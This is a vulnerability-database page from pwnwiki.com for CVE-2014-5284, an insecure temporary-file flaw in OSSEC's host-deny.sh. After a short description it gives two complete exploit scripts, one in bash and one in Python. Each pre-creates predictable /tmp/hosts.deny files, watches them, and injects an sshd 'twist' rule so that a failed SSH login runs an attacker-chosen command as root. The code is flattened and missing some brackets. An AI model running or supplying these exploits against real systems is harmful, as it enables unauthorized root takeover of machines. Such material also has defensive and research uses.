pwnwiki.com
,
INFO
host-deny.sh in OSSEC before 2.8.1 writes to temporary files with predictable filenames without verifying ownership, which allows local users to modify access restrictions in hosts.deny and gain root privileges by creating the temporary files before automatic IP blocking is performed.
CVE-2014-5284.sh
#!/bin/bash ### CVE-2014-5284 ### Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation ### Python is nice but doesn't work all the time ### Exploit Author: mbadanoiu # Python Exploit Author: skynet-13 # Vendor Homepage: www.ossec.net/ # Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz # Version: OSSEC - 2.8 # Created from Research by # Jeff Petersen # Roka Security LLC # email protected # Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1 function create_files { echo "==============================================" echo "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..." for i in $range; do echo -n > /tmp/hosts.deny.$i done } function watch_files { echo "==============================================" echo "Monitoring tmp for file change...." echo "ssh into the system a few times with an incorrect password" echo "Then wait for up to 10 mins" echo "==============================================" ####insert non-empty logic here "$inotifywait" -e close_write /tmp/ --include "hosts.deny." | while read -r dir events file; do on_file_change "$dir$file" break done } function on_file_change { local file="$1" echo "File: $file has just been modified" write_exploit_to_file "$file" } function write_exploit_to_file { local file="$1" echo " sshd : ALL : twist $cmd " > "$file" ###Don't waste time with printing echo 'Writing exploit to this file' echo "==============================================" echo " ssh in again to execute the command" echo "==============================================" echo " End Prog." exit } function verify_inotifywait { if ! -f "$inotifywait" ; then inotifywait=$(which inotifywait) if ! "$inotifywait" ; then echo -e "\nNo inotifywait found on the target!" echo "Configure and make inotify-tools then run this script again:" echo -e "\tcd inotify-tools && ./autogen.sh && ./configure && make\n" exit fi fi } #####MAIN###### cmd="$1" if -z "$cmd" ; then echo "Usage of program:" echo -e "\tbash $0 <Command_to_run_as_root_in_quotes>" exit fi range=$(seq 300 65535) SCRIPT=$(realpath "$0") SCRIPTPATH=$(dirname "$SCRIPT") inotifywait="$SCRIPTPATH/inotify-tools/src/inotifywait" verify_inotifywait create_files watch_files
ossec_host_deny.py
#!/usr/bin/python # Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation # Date: 14-11-14 # Exploit Author: skynet-13 # Exploit Modifier: mbadanoiu # Vendor Homepage: www.ossec.net/ # Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz # Version: OSSEC - 2.8 # Tested on: Ubunutu x86_64 # CVE : 2014-5284 # Created from Research by # Jeff Petersen # Roka Security LLC # email protected # Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1 # Run this on target machine and follow instructions to execute command as root from twisted.internet import inotify from twisted.python import filepath from twisted.internet import reactor import os import optparse import signal class HostDenyExploiter(object): def __init__(self, path_to_watch, cmd): self.path = path_to_watch self.notifier = inotify.INotify() self.exploit = cmd def create_files(self): print "==============================================" print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..." for i in range(300, 65536): filename = "/tmp/hosts.deny.%s" % i f = open(filename, 'w') f.write("") f.close() def watch_files(self): print "==============================================" print "Monitoring tmp for file change...." print "ssh into the system a few times with an incorrect password" print "Then wait for up to 10 mins" print "==============================================" self.notifier.startReading() self.notifier.watch(filepath.FilePath(self.path), callbacks=self.on_file_change) def write_exploit_to_file(self, path): print 'Writing exploit to this file' f = open(str(path).split("'")1, 'w') f.write(' sshd : ALL : twist %s \n' % self.exploit) f.close() print "==============================================" print " ssh in again to execute the command" print "==============================================" print " End Prog." os.kill(os.getpid(), signal.SIGUSR1) def on_file_change(self, watch, path, mask): file=str(path).split("'")1 print 'File: ', file, ' has just been modified' if 'hosts.deny' in file: self.notifier.stopReading() self.write_exploit_to_file(path) if __name__ == '__main__': parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n") parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root') (options, args) = parser.parse_args() cmd = options.cmd if options.cmd is None: print parser.usage exit(0) ex = HostDenyExploiter('/tmp', cmd) ex.create_files() ex.watch_files() reactor.run() exit(0)
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
